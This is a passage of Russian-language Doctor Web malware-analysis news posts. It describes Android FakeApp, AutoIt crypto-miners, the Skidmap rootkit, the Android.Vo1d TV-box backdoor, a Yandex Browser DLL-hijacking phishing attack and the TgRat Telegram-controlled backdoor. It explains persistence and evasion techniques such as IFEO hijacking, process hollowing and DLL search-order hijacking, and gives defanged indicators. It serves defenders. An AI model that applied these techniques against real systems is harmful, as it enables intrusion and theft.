Все модификации трояна привязаны к конкретным доменным именам, что позволяет DNS-серверу передавать каждой из них свою конфигурацию. Более того, имена субдоменов целевых доменов уникальны для каждого зараженного устройства. В них закодированы данные об устройстве, в том числе чувствительные:

модель и бренд устройства;
размеры экрана;
идентификатор (состоит из двух чисел: первое — время установки троянского приложения, второе — случайное число);
заряжается ли батарея и каков текущий процент ее заряда;
включены ли настройки разработчика.

Например, вариант Android.FakeApp.1669, который скрывается в приложении Goal Achievement Planner, при анализе запросил у сервера TXT-запись для домена 3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com., вариант из программы Split it: Checks and Tips — запись для домена 3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital., а вариант из DessertDreams Recipes — для домена 3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com..

Пример TXT-записи целевого домена, которую DNS-сервер отдал при запросе через Linux-утилиту dig при анализе одной из модификаций Android.FakeApp.1669

Для расшифровки содержимого этих TXT-записей необходимо выполнить следующие шаги:

перевернуть строку;
декодировать Base64;
разжать gzip;
разбить на строки по символу ÷.

В результате получатся данные следующего вида (пример ниже относится к TXT-записи для приложения Goal Achievement Planner):

url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954

В них содержится ссылка, которую троян загружает в WebView внутри своего окна поверх основного интерфейса. Эта ссылка ведет на сайт, запускающий длинную цепочку перенаправлений, в конце которой оказывается сайт онлайн-казино. В результате Android.FakeApp.1669 фактически превращается в веб-приложение, которое демонстрирует содержимое загруженного веб-сайта, а не ту функциональность, которая заявлена на странице приложения в Google Play.

Вредоносная программа вместо ожидаемой функциональности отобразила содержимое загруженного сайта онлайн-казино

В то же время, когда трояну доступно интернет-соединение не через целевых поставщиков (а также в офлайн-режиме), он работает как обещанная программа — при условии, если создатели той или иной модификации предусмотрели какую-либо функциональность на такой случай.

Троян не получил конфигурацию от управляющего сервера и запустился как обычная программа

Dr.Web Security Space для мобильных устройств успешно детектирует и удаляет все известные модификации Android.FakeApp.1669, поэтому для наших пользователей этот троян опасности не представляет.

Индикаторы компрометации

Подробнее об Android.FakeApp.1669

В ходе кампании по распространению трояна для добычи и кражи криптовалюты пострадали более 28 тысяч пользователей

Tue, 08 Oct 2024 16:04:14 GMT

8 октября 2024 года

Вирусные аналитики компании «Доктор Веб» выявили идущую масштабную кампанию по распространению вредоносного ПО для добычи и кражи криптовалюты, в рамках которой трояны доставлялись на машины жертв под видом офисных программ, читов для игр и ботов для онлайн-трейдинга.

В ходе рутинного анализа облачной телеметрии, поступающей от наших пользователей, специалисты вирусной лаборатории Доктор Веб выявили подозрительную активность программы, замаскированной под компонент ОС Windows (StartMenuExperienceHost.exe, легитимный процесс с таким именем отвечает за управление меню Пуск). Эта программа связывалась с удаленным сетевым узлом и ждала подключения извне для того, чтобы сразу же запустить интерпретатор командной строки cmd.exe.

Замаскированной под системный компонент была сетевая утилита Ncat, которая используется в правомерных целях для передачи данных по сети посредством командной строки. Именно эта находка помогла восстановить последовательность событий безопасности, среди которых были попытки заражения компьютеров вредоносным ПО, предотвращенные антивирусом Dr.Web.

Источником заражения являются мошеннические сайты, которые злоумышленники создают на платформе GitHub (оговоримся, что такая деятельность запрещена правилами платформы), и запуск скачанных оттуда программ. Альтернативно, ссылки на вредоносное ПО могут быть закреплены в описаниях под видео на хостинге Youtube. При клике по ссылке скачивается самораспаковывающийся зашифрованный архив, защищенный паролем, что предотвращает его автоматическое сканирование антивирусами. После ввода пароля, который хакеры указывают на странице скачивания, на компьютере жертвы в папку %ALLUSERSPROFILE%\jedist распаковывается следующий набор временных файлов:

UnRar.exe — распаковщик архивов RAR;
WaR.rar — архив RAR;
Iun.bat — сценарий, который создает задачу на выполнение скрипта Uun.bat, инициирует перезагрузку компьютера и удаляет себя;
Uun.bat — обфусцированный скрипт, который распаковывает файл WaR.rar, запускает находящиеся в нем файлы ShellExt.dll и UTShellExt.dll, после чего удаляет задачу, созданную Iun.bat и папку jedist вместе с ее содержимым.

Файл ShellExt.dll представляет собой интерпретатор языка AutoIt и сам по себе не является вредоносным. Однако, это не его настоящее имя. Злоумышленники переименовали исходный файл с именем AutoIt3.exe в ShellExt.dll для маскировки под библиотеку программы WinRAR, которая отвечает за интеграцию функций архиватора в контекстное меню Windows. После своего запуска интерпретатор в свою очередь загружает файл UTShellExt.dll, который был позаимствован мошенниками у утилиты Uninstall Tool. К этой библиотеке, подписанной действительной цифровой подписью, они «пришили» вредоносный AutoIt скрипт. После его выполнения происходит распаковка полезной нагрузки, все файлы которой сильно обфусцированы.

Язык AutoIt является языком программирования для создания скриптов автоматизации и утилит для ОС Windows. Простота освоения и широкая функциональность сделали его популярным среди разных категорий пользователей, в том числе и вирусописателей. Некоторые антивирусные программы детектируют любой скомпилированный скрипт AutoIt как вредоносный.

Файл UTShellExt.dll выполняет следующие действия:

Ищет запущенное отладочное ПО в списке процессов. В скрипте содержатся названия примерно 50 различных утилит, используемых для отладки, и при выявлении хотя бы одного процесса из этого списка, скрипт завершает свою работу
Если отладочное ПО не найдено, в скомпрометированную систему распаковываются файлы, необходимые для продолжения атаки. Часть файлов является «чистой», они необходимы для реализации сетевого взаимодействия, а остальные выполняют вредоносные действия
Создает системные события для обеспечения сетевого доступа с помощью Ncat и загрузки BAT и DLL файлов, а также вносит изменения в реестр для реализации перехвата запуска приложений с использованием техники IFEO
IFEO (Image File Execution Options) — это возможности, предоставляемые ОС Windows для разработчиков ПО, например, автоматический запуск отладчика при старте приложения. Однако злоумышленники могут использовать техники IFEO для закрепления в системе. Для этого они меняют путь до отладчика, указывая вместо него путь до вредоносного файла, таким образом, при каждом запуске легитимного приложения будет также запускаться и вредоносное. В этом случае хакеры «цеплялись» к системным службам ОС Windows, а также к процессам обновления браузеров Google Chrome и Microsoft Edge (MoUsoCoreWorker.exe, svchost.exe, TrustedInstaller.exe, GoogleUpdate.exe и MicrosoftEdgeUpdate.exe).
Запрещает доступ к удалению, записи и изменения для папок и файлов, созданных на этапе 2
Отключает службу восстановления ОС Windows
Отправляет в Telegram злоумышленникам информацию о технических характеристиках зараженного компьютера, его имя, версию ОС и сведения об установленном антивирусном ПО.

Функции скрытого майнинга и кражи криптовалюты выполняют файлы DeviceId.dll и 7zxa.dll. Оба файла встраиваются в процесс explorer.exe (Проводник ОС Windows), используя технику Process Hollowing. Первый файл представляет собой легитимную библиотеку, распространяемую в составе среды разработки .NET, в которую был встроен вредоносный AutoIt скрипт, запускающий майнер SilentCryptoMiner. Этот майнер обладает широкими возможностями по конфигурации и маскировке процесса добычи криптовалюты, а также функцией удаленного управления.

Библиотека 7zxa.dll, замаскированная под компонент архиватора 7-Zip, является так называемым клиппером. Данный тип вредоносного ПО используется для мониторинга данных в буфере обмена, которые он может или подменять, или пересылать злоумышленникам. В данном случае клиппер отслеживает появление в буфере обмена типовых последовательностей символов, характерных для адресов кошельков, и заменяет их на те, которые были указаны злоумышленниками. К моменту публикации достоверно известно, что только благодаря клипперу хакеры смогли обогатиться на более чем 6000 долларов (или 571 тысячу рублей).

Техника Process Hollowing заключается в запуске какого-либо доверенного процесса в приостановленном состоянии, перезаписи его кода в памяти на вредоносный, а затем возобновлении выполнения процесса. Использование такой техники приводит к появлению одноименных копий процесса, так в нашем случае на компьютерах жертв наблюдалось три процесса explorer.exe, что является подозрительным самим по себе, так как в норме этот процесс существует в единственном экземпляре.

Всего от действий киберпреступников пострадало более 28 тысяч человек, превалирующее большинство из которых являются жителями России. Также, значимые цифры заражений наблюдаются в Беларуси, Узбекистане, Казахстане, Украине, Кыргызстане и Турции. Поскольку компрометация компьютеров жертв происходила при установке пиратских версий популярных программ, то основными рекомендациями по профилактике подобных инцидентов являются скачивание ПО из официальных источников, использование программ-аналогов с открытым исходным кодом, а также использование антивирусов. Пользователи продуктов Dr.Web надежно защищены от данной угрозы.

Подробнее о Trojan.AutoIt.1443

Индикаторы компрометации

Приманка для злоумышленников: сервер с уязвимой версией базы данных Redis позволил выявить новую модификацию руткита для сокрытия процесса добычи криптовалюты

Thu, 03 Oct 2024 11:05:29 GMT

3 октября 2024 года

Вирусные аналитики компании «Доктор Веб» выявили новую модификацию руткита, устанавливающую на скомпрометированные машины с ОС Linux троян-майнер Skidmap. Этот руткит выполнен в виде вредоносного модуля ядра, который скрывает деятельность майнера, подменяя информацию о загрузке процессора и сетевой активности. Данная атака является массовой и направлена преимущественно на корпоративный сектор — крупные серверы и облачные среды, — так как именно с подобными ресурсами эффективность майнинга будет максимальной.

Система управления базами данных Redis является одной из самых популярных в мире: серверы Redis используются такими крупными компаниями как Х (ранее Twitter), AirBnB, Amazon и др. Преимущества системы очевидны: максимальное быстродействие, минимальные требования к ресурсам, поддержка различных типов данных и языков программирования. Однако у данного продукта есть и минусы: поскольку изначальное применение Redis не предполагало его установку на сетевой периферии, в конфигурации по умолчанию поддерживаются только базовые функции обеспечения безопасности, а в версиях до 6.0 отсутствуют механизмы контроля доступа и шифрования. Кроме того, ежегодно в профильных СМИ появляются сообщения о выявлении в Redis уязвимостей. Например, в 2023 году их было зафиксировано 12, три из которых имели статус «Серьезные». Участившиеся сообщения о компрометации серверов с последующей установкой программ для майнинга заинтересовали специалистов вирусной лаборатории «Доктор Веб», у которых возникло желание непосредственно пронаблюдать за данной атакой. Для этого было принято решение запустить свой сервер Redis с отключенной защитой и ждать непрошеных гостей. В течение года ежемесячно на сервер предпринимались от 10 до 14 тысяч атак, а недавно на сервере было обнаружено присутствие вредоносного ПО Skidmap, на что и рассчитывали наши аналитики. Однако неожиданным стало то, что в этом случае киберпреступники воспользовались новым методом сокрытия активности майнера, а заодно установили сразу четыре бэкдора.

Первые сообщения о трояне Skidmap появились в 2019 году. Данный троян-майнер имеет определенную специализацию и встречается в основном в корпоративных сетях, так как наибольшую отдачу от скрытного майнинга можно получить именно в enterprise-сегменте. Несмотря на то, что с момента появления трояна прошло уже пять лет, принцип его работы остается без изменений: он устанавливается в систему посредством эксплуатации уязвимостей или неправильных настроек ПО. В случае нашего сервера-приманки хакеры добавили в системный планировщик cron задачи, в рамках которых каждые 10 минут запускался скрипт, скачивающий дроппер Linux.MulDrop.142 (или другую его модификацию — Linux.MulDrop.143). Данный исполняемый файл проверяет версию ядра ОС, отключает защитный модуль SELinux, а затем распаковывает в системе файлы руткита Linux.Rootkit.400, майнера Linux.BtcMine.815, а также бэкдоров Linux.BackDoor.Pam.8/9, Linux.BackDoor.SSH.425/426 и трояна Linux.BackDoor.RCTL.2 для удаленного доступа. Отличительной чертой дроппера является то, что он имеет довольно большой размер, так как содержит исполняемые файлы под различные дистрибутивы Linux. В данном случае в тело дроппера были вшито примерно 60 файлов для разных версий дистрибутивов Debian и Red Hat Enterprise Linux, которые наиболее часто устанавливаются на серверы.

После установки руткит перехватывает ряд системных вызовов, что позволяет ему выдавать фейковые сведения в ответ на диагностические команды, вводимые администратором. Среди перехватываемых функций встречаются те, которые сообщают о среднем значении загрузки ЦП, сетевой активности на ряде портов и выводят перечень файлов в папках. Руткит также проверяет все загружаемые модули ядра и запрещает запуск тех, которые могут детектировать его присутствие. Всё это позволяет полностью скрывать все аспекты деятельности майнера по добыче криптовалюты: вычисления, отправку хешей и получение заданий.

Назначение устанавливаемых дроппером бэкдоров в рамках этой атаки заключается в сохранении и отправке злоумышленникам данных обо всех SSH-авторизациях, а также создании мастер-пароля ко всем учетным записям в системе. Отметим, что все пароли при отправке дополнительно шифруются шифром Цезаря со смещением в 4 буквы.

Для расширения возможностей по контролю взломанной системы злоумышленники устанавливают RAT-троян Linux.BackDoor.RCTL.2. Он позволяет отправлять команды на скомпрометированный сервер и получать от него любые данные по зашифрованному соединению, которое троян инициирует самостоятельно.

В качестве майнера устанавливается программа xmrig, позволяющая добывать ряд криптовалют, наиболее известной из которых является Monero, снискавшая популярность в даркнете благодаря своей полной анонимности на уровне транзакций. Следует сказать, что обнаружение прикрытого руткитом майнера в кластере серверов является довольно нетривиальной задачей. В отсутствие достоверных сведений о потреблении ресурсов, единственное, что может натолкнуть на мысль о компрометации — это избыточное энергопотребление и повышенное теплообразование. Злоумышленники также могут изменять настройки майнера таким образом, чтобы обеспечить оптимальный баланс между производительностью майнинга и сохранением быстродействия оборудования, что позволит привлекать меньше внимания к скомпрометированной системе.

Эволюция семейства вредоносного ПО Skidmap проявляется в усложнении схемы атаки: запускаемые программы делают вызовы друг к другу, отключают защитные системы, вмешиваются в работу большого числа системных утилит и служб, загружают руткиты и т. д., что значительно затрудняет действия по реагированию на подобные инциденты.

Перечисленные угрозы внесены в вирусную базу Dr.Web и потому не представляют опасности для пользователей наших продуктов.

Индикаторы компрометации

Подробнее о Linux.MulDrop.142

Подробнее о Linux.MulDrop.143

Подробнее о Linux.MulDrop.144

Подробнее о Linux.Rootkit.400

Атака на ресурсы «Доктор Веб» отражена. Обновление вирусных баз возобновлено

Wed, 18 Sep 2024 15:28:43 GMT

18 сентября 2024 года

Ситуация с атакой на ресурсы "Доктор Веб" успешно разрешена, и мы делимся оперативными новостями и хронологией событий.

Атака на наши ресурсы началась в субботу 14 сентября 2024 года. Мы внимательно за ней наблюдали и держали происходящее под контролем.

16 сентября 2024 года наша компания зафиксировала признаки внешнего неправомерного воздействия на IT-инфраструктуру.

Согласно действующим протоколам безопасности мы оперативно отключили серверы и запустили процесс всесторонней диагностики. Для анализа и устранения последствий инцидента был использован комплекс мер, включавший использование сервиса Dr.Web FixIt! для Linux. На основании полученных данных мы успешно локализовали угрозу и убедились, что она не затронула клиентов компании.

16 сентября, 09:30. В рамках соблюдения протоколов безопасности часть ресурсов компании временно отключена от сети для проведения дополнительной проверки. В связи с этим приостановлен выпуск обновлений вирусных баз Dr.Web.

17 сентября, 16:20. Обновление вирусных баз Dr.Web возобновлено в полном объеме. Никто из пользователей Dr.Web не пострадал.

Мы продолжаем следовать самым высоким стандартам безопасности и оперативно принимаем меры для восстановления стабильной работы всех систем.

Пустота захватила более миллиона ТВ-приставок на Android

Thu, 12 Sep 2024 13:35:09 GMT

12 сентября 2024 года

Специалисты «Доктор Веб» выявили новый случай инфицирования ТВ-приставок на базе Android. Вредоносная программа, получившая имя Android.Vo1d, заразила почти 1 300 000 устройств у пользователей из 197 стран. Это бэкдор, который помещает свои компоненты в системную область и по команде злоумышленников способен скрытно загружать и устанавливать стороннее ПО.

В августе 2024 года в компанию «Доктор Веб» обратилось несколько пользователей, на чьих устройствах антивирус Dr.Web зафиксировал изменения в системной файловой области. Это произошло со следующими моделями:

Модель ТВ-приставки	Заявленная версия прошивки
R4	Android 7.1.2; R4 Build/NHG47K
TV BOX	Android 12.1; TV BOX Build/NHG47K
KJ-SMART4KVIP	Android 10.1; KJ-SMART4KVIP Build/NHG47K

Во всех случаях признаки заражения оказались схожими, поэтому они будут описаны на примере одного из первых обращений. На затронутой трояном ТВ-приставке были изменены следующие объекты:

install-recovery.sh
daemonsu

Кроме того, в ее файловой системе появилось 4 новых файла:

/system/xbin/vo1d
/system/xbin/wd
/system/bin/debuggerd
/system/bin/debuggerd_real

Файлы vo1d и wd — компоненты выявленного нами трояна Android.Vo1d.

Авторы трояна, вероятно, пытались замаскировать один из его компонентов под системную программу /system/bin/vold, назвав его схожим именем «vo1d» (подменив строчную букву «l» цифрой «1»). По имени этого файла вредоносная программа и получила свое наименование. При этом такое написание созвучно со словом «void» (в переводе с английского — пустота).

Файл install-recovery.sh — это скрипт, который присутствует на большинстве Android-устройств. Он запускается при старте операционной системы и содержит данные для автозапуска указанных в нем элементов. Если у какой-либо вредоносной программы есть root-доступ и возможность записи в системный каталог /system, она может закрепиться на инфицированном устройстве, добавив себя в этот скрипт (либо создав его в случае отсутствия в системе). Android.Vo1d прописал в нем автозапуск компонента wd.

Модифицированный файл install-recovery.sh

Файл daemonsu присутствует на многих Android-устройствах с root-доступом. Он запускается системой при загрузке и отвечает за предоставление root-привилегий пользователю. Android.Vo1d прописал себя и в этом файле, также настроив автозапуск модуля wd.

Файл debuggerd является демоном, который обычно применяется для создания отчетов об ошибках. Но при заражении ТВ-приставки этот файл был подменен скриптом, запускающим компонент wd.

Файл debuggerd_real в рассматриваемом случае является копией скрипта, которым был подменен настоящий файл debuggerd. Специалисты «Доктор Веб» полагают, что по задумке авторов трояна исходный debuggerd должен был быть перемещен в debuggerd_real для сохранения его работоспособности. Однако из-за того, что заражение, вероятно, произошло дважды, троян переместил уже подмененный файл (то есть скрипт). В результате на устройстве оказалось два скрипта от трояна и ни одного настоящего файла программы debuggerd.

В то же время у других обратившихся к нам пользователей на зараженных устройствах был несколько иной список файлов:

daemonsu (аналог файла vo1d — Android.Vo1d.1);
wd (Android.Vo1d.3);
debuggerd (аналогичен описанному выше скрипту);
debuggerd_real (оригинальный файл утилиты debuggerd);
install-recovery.sh (скрипт, обеспечивающий загрузку указанных в нем объектов).

Изучение всех этих файлов показало, что для закрепления Android.Vo1d в системе его создатели использовали как минимум три различных метода — модификацию файлов install-recovery.sh и daemonsu, а также подмену программы debuggerd. Вероятно, они рассчитывали, что в инфицируемой системе будет присутствовать хотя бы один из целевых файлов, поскольку манипуляция даже с одним из них обеспечила бы успешный автозапуск трояна при последующих перезагрузках устройства.

Основная функциональность Android.Vo1d скрыта в его компонентах vo1d (Android.Vo1d.1) и wd (Android.Vo1d.3), которые работают в связке. Модуль Android.Vo1d.1 отвечает за запуск Android.Vo1d.3 и контролирует его активность, при необходимости перезапуская процесс. Также по команде управляющего сервера он может скачивать и запускать исполняемые файлы. В свою очередь, модуль Android.Vo1d.3 устанавливает на устройство и запускает зашифрованный в его теле демон (Android.Vo1d.5), который тоже способен скачивать и запускать исполняемые файлы. Кроме того, он отслеживает появление APK-файлов приложений в заданных каталогах и устанавливает их.

Проведенное вирусными аналитиками «Доктор Веб» исследование показало, что бэкдор Android.Vo1d заразил около 1 300 000 устройств, а география его распространения охватила почти 200 стран. Больше всего заражений было выявлено в Бразилии, Марокко, Пакистане, Саудовской Аравии, России, Аргентине, Эквадоре, Тунисе, Малайзии, Алжире и Индонезии.

Страны с наибольшим числом выявленных зараженных устройств

Возможной причиной того, что распространяющие Android.Vo1d злоумышленники выбрали своей целью именно ТВ-приставки, является то, что такие устройства часто работают на базе устаревших версий Android, в которых не закрыты уязвимости и для которых уже не выходят обновления. Например, модели у обратившихся к нам пользователей работают на базе Android 7.1 несмотря на то, что для некоторых из них в конфигурации указаны версии намного новее — Android 10 и Android 12. К сожалению, это нередкая практика, когда производители бюджетных устройств используют старые версии ОС и выдают их за более актуальные, чтобы повысить их привлекательность.

Кроме того, сами пользователи ошибочно могут воспринимать ТВ-приставки как более защищенные устройства по сравнению со смартфонами. Из-за этого они могут реже устанавливать на них антивирус и рискуют столкнуться с вредоносными программами при скачивании сторонних приложений или при установке неофициальных прошивок.

На данный момент источник заражения приставок бэкдором остается неизвестным. Одним из возможных векторов может рассматриваться атака промежуточной вредоносной программы, которая эксплуатирует уязвимости операционной системы для получения root-полномочий. Другим может быть использование неофициальных версий прошивок с root-доступом.

Dr.Web Security Space для мобильных устройств успешно детектирует все известные варианты трояна Android.Vo1d и при наличии root-доступа выполняет лечение зараженных гаджетов.

Индикаторы компрометации

Подробнее об Android.Vo1d.1

Подробнее об Android.Vo1d.3

Подробнее об Android.Vo1d.5

Использование Яндекс Браузера для закрепления в скомпрометированной системе. Несостоявшаяся целевая атака на российского оператора грузовых железнодорожных перевозок.

Wed, 04 Sep 2024 10:21:45 GMT

Скачать в PDF

4 сентября 2024 года

Социальная инженерия — крайне эффективный метод мошенничества, которому сложно противостоять. Опытный злоумышленник умеет найти правильный подход к жертве, запугать или убедить ее выполнить какое-то действие. Но что если для реализации атаки не требуется каких-либо значимых коммуникативных усилий, а компьютер из цифрового помощника превращается в невольного соучастника преступления?

Целевой фишинг — популярный метод доставки вредоносного ПО на компьютеры сотрудников крупных компаний. От обычного фишинга он отличается тем, что злоумышленники заранее собирают информацию и персонализируют свое сообщение, побуждая жертву выполнить какое-то действие, которое приведёт к компрометации. Основными целями преступники выбирают или высокопоставленных сотрудников, обладающих доступом к ценной информации, или сотрудников тех отделов, которые по долгу службы контактируют с множеством адресатов. В частности это касается работников отдела кадров: они получают массу писем от ранее незнакомых лиц с вложениями в самых разных форматах. Такой вектор атаки и был избран мошенниками в том случае, о котором мы сейчас вам расскажем.

В марте 2024 года в компанию «Доктор Веб» обратились представители крупного российского предприятия, работающего в отрасли грузовых железнодорожных перевозок. Внимание сотрудников отдела информационной безопасности привлекло подозрительное письмо с прикрепленным к нему вложением. После попытки самостоятельно определить, какую опасность несет приложенный файл, они обратились к нашим специалистам. Ознакомившись с полученным запросом, наши аналитики пришли к выводу, что компания чуть не стала жертвой целевой атаки. Задачами, которые ставили перед собой злоумышленники, был сбор информации о системе и запуск модульного вредоносного ПО на скомпрометированном ПК.

Для реализации атаки киберпреступники отправили на электронный адрес компании фишинговое письмо, замаскированное под резюме соискателя вакансии. К письму был приложен архив, якобы содержащий PDF-файл с анкетой. Этот файл имел «двойное» расширение .pdf.lnk. Сокрытие вредоносных объектов при использовании двойных расширений — довольно частая тактика злоумышленников, которой они пользуются для того, чтобы вводить своих жертв в заблуждение. По умолчанию ОС Windows скрывает расширения файлов для удобства пользователя. А если файл имеет «двойное» расширение, то система скрывает только последнее из них. Таким образом, в данном случае жертва могла видеть первое расширение — .pdf, а расширение .lnk было скрыто. Отметим, что даже при включенном отображении полных имен файлов расширение .lnk всегда скрывается ОС.

Идея компрометации систем посредством lnk-файлов не нова. Наиболее знаковая атака произошла в 2010 году, когда оборудование для обогащения урана в иранском городе Нетенз подверглось беспрецедентному кибервоздействию со стороны злоумышленников. Червь под название Stuxnet атаковал ПЛК, управляющие газовыми центрифугами, выводя последние на запредельную скорость вращения, а затем резко останавливая, из-за чего происходило разрушение их корпусов. Помимо порчи оборудования этот червь инфицировал более 200 000 компьютеров во многих странах мира. Основным вектором атаки был lnk-файл, который попал на управляющий компьютер предприятия на USB-носителе. А для запуска вредоносного достаточно было лишь перейти в папку, содержащую специально сформированный lnk-файл. В рамках атаки было задействовано 4 уязвимости нулевого дня, в частности эксплойт CPLINK, что позволило запустить червя Stuxnet без участия пользователя.

Метаданные, хранящиеся в lnk-файле

Истинное расширение .lnk является расширением ярлыков в ОС Windows. В поле «Объект» (Target) можно указать путь до любого объекта ОС — например, исполняемого файла — и запустить его с требуемыми параметрами. В рамках этой атаки скрытно происходил запуск интерпретатора команд PowerShell, скачивавший с сайта злоумышленников два вредоносных скрипта, каждый из которых запускал свою полезную нагрузку.

Схема атаки

Первая из них представляла собой отвлекающий PDF, а также исполняемый файл с названием YandexUpdater.exe, маскирующийся под компонент для обновления Яндекс Браузера (название реального компонента — service_update.exe). Данный исполняемый файл представляет собой дроппер трояна Trojan.Packed2.46324, который после ряда проверок, направленных на выявление факта запуска в эмулируемом окружении и наличия ПО для отладки, распаковывал в скомпрометированной системе трояна Trojan.Siggen28.53599. Последний имеет возможность удаленного управления, выполняет сбор системной информации и скачивание различных вредоносных модулей. Помимо данных функций троян также обладает возможностями по противодействию отладке. При выявлении процессов антивирусов, виртуальных машин и отладчиков троян перезаписывает свой файл нулями и удаляет его вместе с папкой, в которой он хранился.

Отвлекающий PDF-файл

Вторая полезная нагрузка состояла из отвлекающего PDF-файла и трояна Trojan.Siggen27.11306. Данный троян представляет собой динамическую библиотеку (DLL) с зашифрованной полезной нагрузкой. Особенность данного трояна заключается в том, что он эксплуатирует уязвимость Яндекс Браузера к перехвату порядка поиска DLL (DLL Search Order Hijacking). В ОС Windows DLL-файлы представляют собой библиотеки, которые используются приложениями для хранения функций, переменных и элементов интерфейса. В момент своего запуска приложения выполняют поиск библиотек в различных хранилищах данных в определенном порядке, поэтому злоумышленники могут попытаться «пролезть без очереди» и поместить вредоносную библиотеку в ту папку, где поиск DLL происходит с наибольшим приоритетом.

Упрощенная схема приоритета поиска библиотек

Данный троян сохраняется в скрытую папку %LOCALAPPDATA%\Yandex\YandexBrowser\Application под именем Wldp.dll. Именно в этот каталог устанавливается Яндекс Браузер, и там же браузер будет искать необходимые ему библиотеки при запуске. В свою очередь, легитимная библиотека Wldp.dll, функция которой заключается в обеспечении безопасности запуска приложений, является системной библиотекой ОС и находится в папке %WINDIR%\System32. А так как вредоносная библиотека располагается в папке установки Яндекс Браузера, то первой будет загружаться именно она. При этом она получает все разрешения основного приложения: может выполнять команды и создавать процессы от имени браузера, а также наследовать правила брандмауэра для доступа в интернет.

После запуска браузера вредоносная библиотека Wldp.dll расшифровывает зашитую в нее полезную нагрузку. Следует отметить, что расшифровка выполняется дважды. В первый раз она производится с помощью ключа, создаваемого на основе хеша пути, по которому расположена вредоносная DLL, а затем — с помощью глобального ключа, зашитого в тело трояна. Результатом расшифровки является шелл-код, выполнение которого позволяет злоумышленникам запустить в скомпрометированной системе приложение, написанное на языке .NET. В свою очередь, этот стейджер загружал из сети вредоносное ПО. К сожалению, на момент нашего расследования на сервере, с которым связывался загрузчик, искомый файл был недоступен, и нам не удалось узнать, какой конкретно троян скачивался в данном случае.

Таким образом, мы видим многовекторную и многоступенчатую схему инфицирования одновременно двумя разными троянами, которые доставляются в скомпрометированную систему при открытии файла из фишингового письма. Несмотря на запутанную реализацию, методы профилактики и защиты от таких атак довольно просты. Они изложены ниже.

Повышение осведомленности сотрудников в вопросах информационной безопасности (внимательно проверять ссылки и имена файлов, не открывать подозрительные объекты и т. п.).
Использование программных продуктов, выполняющих фильтрацию писем, для предотвращения доставки вредоносных писем и вложений — например, Dr.Web Mail Security Suite.
Установка на всех узлах сети антивирусного ПО, которое не пропустит опасный файл при работе в интернете или заблокирует подозрительную активность на компьютерах пользователей, если файл был доставлен на USB-носителе — например, Dr.Web Desktop Security Suite и Dr.Web Server Security Suite.
Своевременное обновление ПО, в рамках которого устраняются программные ошибки.

После обнаружения эксплуатации уязвимости в Яндекс Браузере мы передали информацию о ней в компанию Яндекс. Разработчики оперативно отреагировали на наше сообщение, в результате чего была выпущена версия Яндекс Браузера 24.7.1.380 с исправлением, а найденной уязвимости был присвоен идентификатор CVE-2024-6473.

В дальнейшем мы координировали дату публикации этой новости с разработчиками браузера, чтобы дать возможность пользователям получить исправленную версию Яндекс Браузера до обнародования подробностей об этой атаке.

Индикаторы компрометации

И полетят тут телеграммы: троян-бэкдор с управлением через Telegram атакует серверы на ОС Linux

Thu, 04 Jul 2024 15:44:12 GMT

4 июля 2024 года

Специалисты компании «Доктор Веб» выявили Linux-версию известного трояна TgRat, применяемого для целевых атак на компьютеры. Одной из примечательных особенностей данного трояна является то, что он управляется посредством Telegram-бота.

Это вредоносное ПО принадлежит к типу троянов удалённого доступа, более известному под довольно неблагозвучной, но очень меткой аббревиатурой RAT (в переводе с английского «крыса»). По своей сути «ратники» — это привычные средства удалённого доступа и администрирования, но работающие на злоумышленников. Основное отличие заключается в том, что атакуемый пользователь не должен заподозрить, что на его машине хозяйничает кто-то другой.

Изначально троян TgRat, написанный для ОС Windows, был выявлен в 2022 году. Он представлял собой небольшую вредоносную программу, предназначенную для выгрузки данных с конкретной скомпрометированной машины. Не так давно вирусные аналитики компании «Доктор Веб» обнаружили его собрата, адаптированного для работы в ОС Linux.

Запрос на расследование инцидента информационной безопасности поступил в нашу вирусную лабораторию от компании, предоставляющей услуги хостинга. Антивирус Dr.Web обнаружил подозрительный файл на сервере одного из клиентов. Им оказался дроппер трояна, то есть программа, которая предназначена для установки вредоносного ПО на атакуемый компьютер. Этот дроппер распаковывал в систему троян Linux.BackDoor.TgRat.2.

Этот троян также создавался для атаки на конкретные компьютеры: при запуске он сверяет хеш имени машины со строкой, вшитой в тело трояна. Если значения не совпадают, TgRat завершает свой процесс. А в случае успешного запуска троян подключается к сети и реализует довольно необычную схему взаимодействия со своим управляющим сервером, в качестве которого выступает Telegram-бот.

Мессенджер Telegram довольно часто используется во многих компаниях в качестве корпоративного средства общения. Поэтому нет ничего удивительного в том, что злоумышленники могут эксплуатировать его в качестве канала для управления вредоносным ПО и кражи конфиденциальной информации: популярность программы и рутинность трафика к серверам Telegram способствуют маскировке вредоносного ПО в скомпрометированной сети.

Управление трояном осуществляется через закрытую группу в мессенджере, к которой подключен Telegram-бот. Используя мессенджер, злоумышленники могут отдавать команды трояну: например, скачать со скомпрометированной системы файлы, сделать снимок экрана, удалённо выполнить команду или загрузить файл, используя вложения.

В отличие от своего собрата для Windows, код этого трояна был зашифрован шифром RSA, а для выполнения команд использовался интерпретатор bash, что позволяло выполнять целые скрипты в рамках одного сообщения. Каждый экземпляр трояна имеет свой собственный идентификатор — таким образом злоумышленники могли отправлять команды нескольким ботам, подключив их все к одному чату.

Данная атака, несмотря на её необычность в плане выбора схемы взаимодействия между трояном и управляющим сервером, может быть выявлена при внимательном анализе сетевого трафика: обмен данными с серверами Telegram может быть характерным для пользовательских компьютеров, но никак не для сервера в локальной сети.

Для профилактики заражения мы рекомендуем устанавливать антивирусное ПО на все узлы локальной сети. Антивирусные решения линейки Dr.Web Enterprise Security Suite для серверов и рабочих станций на базе ОС Windows, macOS, Android, Linux и FreeBSD надежно защищают наших корпоративных клиентов. А для NGFW- и IDS-устройств на сетевом периметре компания «Доктор Веб» предлагает решение на базе технологии потокового сканирования трафика, которое позволяет проверять сетевой трафик с практически нулевой задержкой.

Индикаторы компрометации

Исследование целевой атаки на российское предприятие машиностроительного сектора

Mon, 11 Mar 2024 09:38:53 GMT

Скачать в PDF

11 марта 2024 года

Введение

